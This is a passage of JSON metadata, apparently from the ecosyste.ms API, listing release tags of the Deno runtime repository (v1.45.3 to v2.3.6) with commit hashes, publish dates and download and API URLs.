ar.gz/v2.3.6","html_url":"https://github.com/denoland/deno/releases/tag/v2.3.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.3.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.6/manifests"},{"name":"v2.3.5","sha":"4794dc147e51c75cfa501d39da72cbd0ecb9b068","kind":"commit","published_at":"2025-05-30T11:01:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.3.5","html_url":"https://github.com/denoland/deno/releases/tag/v2.3.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.3.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.5/manifests"},{"name":"v2.3.4","sha":"37ba6223b6733c4b18d4727c23f6831558c0ccc8","kind":"commit","published_at":"2025-05-29T22:48:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.3.4","html_url":"https://github.com/denoland/deno/releases/tag/v2.3.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.3.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.4/manifests"},{"name":"v2.3.3","sha":"395878c5fb72d87a44f7c88ce9f391acc31feab3","kind":"commit","published_at":"2025-05-16T11:37:53.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.3.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.3.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.3.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.3/manifests"},{"name":"v2.3.2","sha":"7b74f385396bded16f99db64b97aa48e6f603f16","kind":"commit","published_at":"2025-05-15T23:18:59.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.3.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.3.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.3.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.2/manifests"},{"name":"v2.2.13","sha":"0117f27aef98e1bf9a8689fe5ab6b03b5a1453f7","kind":"commit","published_at":"2025-05-13T20:00:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.13","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.13","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.13","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.13","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.13/manifests"},{"name":"v2.1.13","sha":"5b85bdaf88e36a1fcae3e442d96f026e4e1f9b92","kind":"commit","published_at":"2025-05-13T19:41:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.13","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.13","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.13","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.13","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.13/manifests"},{"name":"v2.3.1","sha":"8773b5f5b074e1e374a403d05943b6a7bbbdebad","kind":"commit","published_at":"2025-04-30T10:48:46.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.3.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.3.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.3.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.1/manifests"},{"name":"v2.3.0","sha":"61574bb9c9c255d5c661add6c7464af30475c197","kind":"commit","published_at":"2025-04-30T07:49:31.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.3.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.3.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.3.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.0/manifests"},{"name":"v2.2.12","sha":"81da8139af85a0cb7efa9050ae6b5461b3614077","kind":"commit","published_at":"2025-04-24T20:37:22.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.12","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.12","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.12","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.12","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.12/manifests"},{"name":"v2.2.11","sha":"225fbd59bf9a1d50603adb99fe2748edf70b9de2","kind":"commit","published_at":"2025-04-18T12:16:45.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.11","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.11/manifests"},{"name":"v2.2.10","sha":"adc34a6b3b8f6ff593810c0655d0d1a4b7ea3729","kind":"commit","published_at":"2025-04-14T20:59:59.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.10","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.10/manifests"},{"name":"v2.1.12","sha":"16b18e2b8dddde755364b740d63aa7da3646b33c","kind":"commit","published_at":"2025-04-11T23:06:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.12","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.12","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.12","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.12","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.12/manifests"},{"name":"v2.2.9","sha":"25defa74d539d1d6fd27ddabd5260705677c43e8","kind":"commit","published_at":"2025-04-11T18:52:19.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.9","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.9/manifests"},{"name":"v2.1.11","sha":"d73d467148cff810ccf9c96bed9bcaf32ce5281c","kind":"commit","published_at":"2025-04-08T23:54:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.11","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.11/manifests"},{"name":"v2.2.8","sha":"32b9cc91d8c343bdec2ddcf3cedb27b5efc2f5e4","kind":"commit","published_at":"2025-04-05T01:17:29.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.8","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.8/manifests"},{"name":"v2.2.7","sha":"e7dab411533fd7240fd794398ba9d9590e28f69d","kind":"commit","published_at":"2025-04-04T08:05:09.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.7","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.7/manifests"},{"name":"v2.2.6","sha":"2037200c4bc903162cd16b71b2564ab5bcd0601e","kind":"commit","published_at":"2025-03-28T05:25:19.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.6","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.6/manifests"},{"name":"v2.2.5","sha":"6e08a9d2291cf45ae4031e163b8c1a03a0e85983","kind":"commit","published_at":"2025-03-21T05:07:53.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.5","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.5/manifests"},{"name":"v2.2.4","sha":"33132abbd9ee0defa4bf0332c4797ee4341a03fc","kind":"commit","published_at":"2025-03-14T19:06:09.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.4","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.4/manifests"},{"name":"v2.2.3","sha":"8203278401f4ffcb477a28b3ae9b915d88de7dd7","kind":"commit","published_at":"2025-03-05T04:00:03.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.3/manifests"},{"name":"v2.2.2","sha":"b2e5efd3826974857f4e5a94d87c2c724fa5bf5d","kind":"commit","published_at":"2025-02-25T07:17:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.2/manifests"},{"name":"v2.2.1","sha":"6057bc30da1df2b247f584b5280e1f10c02eec75","kind":"commit","published_at":"2025-02-20T23:41:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.1/manifests"},{"name":"v2.2.0","sha":"29688168631edb677a444ba3cd02b2be21304a1f","kind":"commit","published_at":"2025-02-18T23:12:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.0/manifests"},{"name":"v2.1.10","sha":"073e0879791486f70c7ac99d2d100c3fca6ac461","kind":"commit","published_at":"2025-02-13T06:33:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.10","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.10/manifests"},{"name":"v2.1.9","sha":"46e2f9a47ee5293547efd089438db29690a05f85","kind":"commit","published_at":"2025-01-31T00:21:43.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.9","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.9/manifests"},{"name":"v2.1.8","sha":"318646f7678111d24b139f4c589a4ef447c8cf1c","kind":"commit","published_at":"2025-01-30T18:19:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.8","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.8/manifests"},{"name":"v2.1.7","sha":"379079d9049499af660b70423aa7cc3aca0d5e52","kind":"commit","published_at":"2025-01-22T00:51:38.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.7","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.7/manifests"},{"name":"v2.1.6","sha":"4ee86d8d125c7b36570e87f0725eb82b6fe4a4b4","kind":"commit","published_at":"2025-01-16T23:35:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.6","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.6/manifests"},{"name":"v2.1.5","sha":"d15a95e28b0ec015c2f2a88cca3882ba96d5da98","kind":"commit","published_at":"2025-01-09T20:55:14.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.5","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.5/manifests"},{"name":"v2.1.4","sha":"b32ed7516cfdaaff76203ca530796d6a1235568d","kind":"commit","published_at":"2024-12-11T03:31:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.4","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.4/manifests"},{"name":"v2.1.3","sha":"7f9b1ff30f7d9880b7c825c2b5f2de3137343d76","kind":"commit","published_at":"2024-12-05T23:36:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.3/manifests"},{"name":"v2.1.2","sha":"2039abe8d2bc82fa800f4118707a48ac6f5e02ae","kind":"commit","published_at":"2024-11-28T15:45:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.2/manifests"},{"name":"v2.1.1","sha":"5d71b461530f7c374c08701cef5678a5a4ac5484","kind":"commit","published_at":"2024-11-21T17:28:20.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.1/manifests"},{"name":"v2.1.0","sha":"3da4eca7c1ed97906654671669e0bb3b095bc637","kind":"commit","published_at":"2024-11-21T02:05:02.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.0/manifests"},{"name":"v2.0.6","sha":"8f59d18202e94e5c54ad7e5a79ec1383159e4a20","kind":"commit","published_at":"2024-11-10T04:38:11.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.0.6","html_url":"https://github.com/denoland/deno/releases/tag/v2.0.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.0.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.6/manifests"},{"name":"v2.0.5","sha":"78a799b4947461eb5c6092295cbcdabfe94053f7","kind":"commit","published_at":"2024-11-06T00:19:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.0.5","html_url":"https://github.com/denoland/deno/releases/tag/v2.0.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.0.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.5/manifests"},{"name":"v2.0.4","sha":"b7c282d2f80b12b0b2a435780fb0ea2b236ab224","kind":"commit","published_at":"2024-10-30T00:15:35.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.0.4","html_url":"https://github.com/denoland/deno/releases/tag/v2.0.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.0.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.4/manifests"},{"name":"v2.0.3","sha":"997bd47fc27ad920f3388c94a95829ff45394c84","kind":"commit","published_at":"2024-10-25T00:57:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.0.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.0.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.0.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.3/manifests"},{"name":"v2.0.2","sha":"22a79ea420e67e783d996d5d1d64983192cb3dd8","kind":"commit","published_at":"2024-10-17T23:28:36.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.0.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.0.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.0.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.2/manifests"},{"name":"v2.0.1","sha":"99c2aa573057e337f3474d43a7aab8c5e6b4caa2","kind":"commit","published_at":"2024-10-16T22:42:35.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.0.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.0.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.0.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.1/manifests"},{"name":"v2.0.0","sha":"a62c7e036ab6851c0293f407ead635a7331445b7","kind":"commit","published_at":"2024-10-08T14:37:28.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.0.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.0.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.0.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.0/manifests"},{"name":"v1.46.3","sha":"a98e146a55b209458160bcd148497310a9e14441","kind":"commit","published_at":"2024-09-04T12:12:16.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.46.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.46.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.46.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.46.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.46.3/manifests"},{"name":"v1.46.2","sha":"1b62d42631013724432f1ba4a3b04f506450abba","kind":"commit","published_at":"2024-08-29T16:07:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.46.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.46.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.46.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.46.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.46.2/manifests"},{"name":"v1.46.1","sha":"de11ff8c556c6922f832f639f54e5f7a6a3096b9","kind":"commit","published_at":"2024-08-22T14:18:55.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.46.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.46.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.46.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.46.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.46.1/manifests"},{"name":"v1.46.0","sha":"3314a0ceb8f874986d5da9f36f683740bd813750","kind":"commit","published_at":"2024-08-22T00:16:45.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.46.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.46.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.46.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.46.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.46.0/manifests"},{"name":"v1.45.5","sha":"52fd273834c0675f651577e23785d76f67423ab1","kind":"commit","published_at":"2024-07-31T19:11:09.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.45.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.45.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.45.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.5/manifests"},{"name":"v1.45.4","sha":"c0b1d19d559bfb1fbb65675b3849a9c0396d131f","kind":"commit","published_at":"2024-07-26T16:38:02.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.45.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.45.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.45.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.4/manifests"},{"name":"v1.45.3","sha":"87ce64e57486fc006e82806c9ed8c49f11c2cb73","kind":"commit","published_at":"2024-07-22T21:34:15.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.45.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.45.3","dependencies_parsed_at":null,"dependency_j